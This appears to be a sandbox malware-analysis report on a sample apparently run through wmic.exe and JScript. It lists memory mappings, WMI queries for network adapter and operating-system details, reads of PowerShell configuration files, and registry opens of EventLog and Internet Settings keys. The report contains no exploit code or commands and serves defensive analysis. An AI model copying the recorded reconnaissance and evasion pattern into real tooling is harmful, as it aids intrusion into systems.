private_0x00000233e1440000 0x233e1440000 0x233e144ffff Private Memory Readable, Writable True False False -
private_0x00000233e14d0000 0x233e14d0000 0x233e14dffff Private Memory Readable, Writable True False False -
private_0x00000233e14f0000 0x233e14f0000 0x233e14fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x233e1500000 0x233e1836fff Memory Mapped File Readable False False False -
private_0x00000233e1840000 0x233e1840000 0x233e1a2ffff Private Memory Readable, Writable True False False -
private_0x00000233e1840000 0x233e1840000 0x233e195ffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x233e1840000 0x233e191ffff Memory Mapped File Readable False False False -
private_0x00000233e1950000 0x233e1950000 0x233e195ffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1960000 0x233e1960000 0x233e1a1bfff Pagefile Backed Memory Readable True False False -
private_0x00000233e1a20000 0x233e1a20000 0x233e1a2ffff Private Memory Readable, Writable True False False -
private_0x00000233e1a30000 0x233e1a30000 0x233e1e2ffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e1e30000 0x233e1e30000 0x233e1fb7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e1fc0000 0x233e1fc0000 0x233e2140fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000233e2150000 0x233e2150000 0x233e354ffff Pagefile Backed Memory Readable True False False -
private_0x00000233e3550000 0x233e3550000 0x233e370ffff Private Memory Readable, Writable True False False -
rpcss.dll 0x233e3550000 0x233e362cfff Memory Mapped File Readable False False False -
private_0x00000233e3550000 0x233e3550000 0x233e364ffff Private Memory Readable, Writable True False False -
private_0x00000233e3700000 0x233e3700000 0x233e370ffff Private Memory Readable, Writable True False False -
private_0x00000233e3710000 0x233e3710000 0x233e380ffff Private Memory Readable, Writable True False False -
private_0x00000233e3810000 0x233e3810000 0x233e390ffff Private Memory Readable, Writable True False False -
private_0x00000233e3910000 0x233e3910000 0x233e3a0ffff Private Memory Readable, Writable True False False -
pagefile_0x00000233e3a10000 0x233e3a10000 0x233e3e0afff Pagefile Backed Memory Readable True False False -
private_0x00000233e3f40000 0x233e3f40000 0x233e3f4ffff Private Memory Readable, Writable True False False -
pagefile_0x00007df5ff900000 0x7df5ff900000 0x7ff5ff8fffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff66de40000 0x7ff66de40000 0x7ff66df3ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff66df40000 0x7ff66df40000 0x7ff66df62fff Pagefile Backed Memory Readable True False False -
wmic.exe 0x7ff66e670000 0x7ff66e6f1fff Memory Mapped File Readable, Writable, Executable True False False -
jscript.dll 0x7ffbf6140000 0x7ffbf6207fff Memory Mapped File Readable, Writable, Executable True False False -
amsi.dll 0x7ffbf68c0000 0x7ffbf68cffff Memory Mapped File Readable, Writable, Executable False False False -
wmi2xml.dll 0x7ffbf7780000 0x7ffbf779bfff Memory Mapped File Readable, Writable, Executable False False False -
msoxmlmf.dll 0x7ffbf77c0000 0x7ffbf77d2fff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x7ffbf8a40000 0x7ffbf8ad7fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ffbf8ae0000 0x7ffbf8b47fff Memory Mapped File Readable, Writable, Executable True False False -
msxml3.dll 0x7ffbfc900000 0x7ffbfcb3efff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x7ffbfe150000 0x7ffbfe19dfff Memory Mapped File Readable, Writable, Executable False False False -
mskeyprotect.dll 0x7ffc03cc0000 0x7ffc03cd3fff Memory Mapped File Readable, Writable, Executable False False False -
ncryptsslp.dll 0x7ffc03d40000 0x7ffc03d5dfff Memory Mapped File Readable, Writable, Executable False False False -
vcruntime140.dll 0x7ffc05ea0000 0x7ffc05eb5fff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x7ffc063e0000 0x7ffc06404fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x7ffc06410000 0x7ffc06423fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x7ffc06430000 0x7ffc06525fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x7ffc06700000 0x7ffc0698dfff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x7ffc06b80000 0x7ffc06b90fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x7ffc079e0000 0x7ffc07b97fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x7ffc07e60000 0x7ffc07edefff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffc08000000 0x7ffc08009fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x7ffc0ad10000 0x7ffc0ad19fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x7ffc0b3b0000 0x7ffc0b3c4fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x7ffc0c360000 0x7ffc0c3c6fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x7ffc0c430000 0x7ffc0c43afff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x7ffc0c8d0000 0x7ffc0c907fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x7ffc0d740000 0x7ffc0dac1fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x7ffc0f200000 0x7ffc0f2c7fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffc119f0000 0x7ffc11a11fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffc123a0000 0x7ffc12435fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x7ffc12490000 0x7ffc12539fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7ffc12bc0000 0x7ffc12cb3fff Memory Mapped File Readable, Writable, Executable False False False -
schannel.dll 0x7ffc12f70000 0x7ffc12fe9fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffc13030000 0x7ffc13063fff Memory Mapped File Readable, Writable, Executable False False False -
dpapi.dll 0x7ffc13070000 0x7ffc13079fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x7ffc132f0000 0x7ffc1334bfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffc133a0000 0x7ffc133b6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffc134c0000 0x7ffc134cafff Memory Mapped File Readable, Writable, Executable False False False -
ntasn1.dll 0x7ffc13550000 0x7ffc13589fff Memory Mapped File Readable, Writable, Executable False False False -
ncrypt.dll 0x7ffc13590000 0x7ffc135b6fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffc136a0000 0x7ffc136ccfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffc13950000 0x7ffc13978fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffc13a20000 0x7ffc13a33fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffc13a40000 0x7ffc13a8afff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffc13a90000 0x7ffc13a9ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffc13aa0000 0x7ffc13aaefff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffc13bf0000 0x7ffc13c44fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffc13c50000 0x7ffc14293fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffc142c0000 0x7ffc14486fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ffc14490000 0x7ffc144d2fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffc144e0000 0x7ffc14549fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffc14740000 0x7ffc147f4fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffc14800000 0x7ffc14942fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffc14950000 0x7ffc14a6bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffc14a70000 0x7ffc15fcefff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffc15fd0000 0x7ffc1624cfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffc16250000 0x7ffc162f6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffc16550000 0x7ffc165f6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffc16660000 0x7ffc166bafff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffc167d0000 0x7ffc1680afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffc16810000 0x7ffc16969fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffc16970000 0x7ffc169dafff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffc169e0000 0x7ffc16b65fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffc16fa0000 0x7ffc16fa7fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffc16fb0000 0x7ffc17070fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffc171d0000 0x7ffc17325fff Memory Mapped File Readable, Writable, Executable False False False -
coml2.dll 0x7ffc17330000 0x7ffc1739efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffc173a0000 0x7ffc173f1fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 131 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
COM (22)
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 3 Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1 Fn
Create 8D1C559D-84F0-4BB3-A7D5-56A7435A9BA6 BFBF883A-CAD7-11D3-A11B-00105A1F515A cls_context = CLSCTX_INPROC_SERVER True 1 Fn
Create WbemDefaultPathParser IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 8 Fn
Create WBEMLocator IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\X2VS1CUM\ROOT\CIMV2 True 1 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\localhost\root\cimv2 True 1 Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = select * from Win32_NETwoRkADAPterConFiguRaTIon True 1 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\localhost\root\cimv2 True 1 Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = select * from WIN32_OpErAtIngSySTeM True 1 Fn
File (95)
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
Get Info C:\Windows\System32\Wbem\WMIC.config type = file_attributes False 3 Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 1 Fn
Get Info C:\Users\Nd9E1FYi type = file_attributes True 5 Fn
Get Info C:\ type = file_attributes True 6 Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2 Fn
Get Info - type = file_type True 1 Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 6 Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2 Fn
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 7 Fn
Get Info C:\Users type = file_attributes True 4 Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1 Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_profile.ps1 type = file_attributes False 1 Fn
Get Info C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1 Fn
Get Info C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\PowerShell_profile.ps1 type = file_attributes False 1 Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2 Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2 Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1 Fn
Open STD_OUTPUT_HANDLE - True 1 Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 1 Fn, Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 972 True 1 Fn, Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 5 Fn, Data
Read - size = 4096, size_out = 4096 True 1 Fn, Data
Read - size = 4096, size_out = 978 True 1 Fn, Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 1 Fn, Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 214 True 1 Fn, Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 14 Fn, Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 1 Fn, Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 1 Fn, Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6 Fn, Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1 Fn, Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1 Fn
Registry (316)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1 Fn
Open Key HKEY_CURRENT_USER\Environment - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1 Fn
Open Key HKEY_CURRENT_USER - True 1 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727 - True 1 Fn
Open Key HKEY_CURRENT_USER - True 1 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1 Fn
Open Key HKEY_CURRENT_USER - True 1 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 2 Fn
Open Key HKEY_CURRENT_USER - True 1 Fn
Open Key HKEY_CURRENT_USER - True 14 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 4 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 4 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 8 Fn
Open Key HKEY_CURRENT_USER - True 2 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 4 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 4 Fn
Open Key HKEY_CURRENT_USER - True 18 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 3 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 3 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 3 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 2 Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 11 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 11 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 11 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1 Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1 Fn
